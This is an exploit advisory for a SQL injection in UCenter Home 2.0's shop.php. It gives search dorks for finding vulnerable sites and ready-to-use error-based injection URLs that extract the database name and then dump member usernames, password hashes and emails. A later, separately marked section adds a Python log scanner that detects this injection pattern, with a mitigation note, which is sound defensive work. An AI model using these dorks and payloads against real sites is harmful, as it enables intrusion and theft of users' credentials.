__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..

DB : Okey.

Edit the DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, then edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
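
Detection side, as an added example that is not part of the original advisory: a Python check that flags requests to shop.php whose shopid is not a plain integer and labels the floor(rand())/group by error-based pattern shown above. The log format, IP addresses and the names classify/scan are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '198.51.100.23 - - [01/Jan/2011:10:01:12 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
    '198.51.100.4 - - [01/Jan/2011:10:02:30 +0000] "GET /space.php?uid=7 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Building blocks of the duplicate-key (error-based) pattern in the advisory.
MARKERS = ("floor(rand(", "group by", "information_schema", "concat(", "count(*)")

def classify(line):
    """Return (verdict, matched_markers) for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return ("unparsed", [])
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return ("other", [])
    values = parse_qs(url.query, keep_blank_values=True).get("shopid")
    if values is None:
        return ("other", [])
    # URL-decoded by parse_qs; lower-case and collapse whitespace before matching.
    value = " ".join(values[-1].lower().split())
    if re.fullmatch(r"[0-9]+", value):
        return ("ok", [])
    hits = [k for k in MARKERS if k in value]
    if "floor(rand(" in hits and "group by" in hits:
        return ("error_based_sqli", hits)
    # Any non-integer shopid is still reported, even without a known marker.
    return ("non_numeric_shopid", hits)

def scan(lines):
    """Return (client_ip, verdict) for every suspicious shop.php request."""
    findings = []
    for line in lines:
        verdict, _ = classify(line)
        if verdict in ("error_based_sqli", "non_numeric_shopid"):
            findings.append((line.split()[0], verdict))
    return findings

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The integer test is the part that matters for mitigation as well: a shopid that is cast to an integer before it reaches the query cannot carry any of the markers.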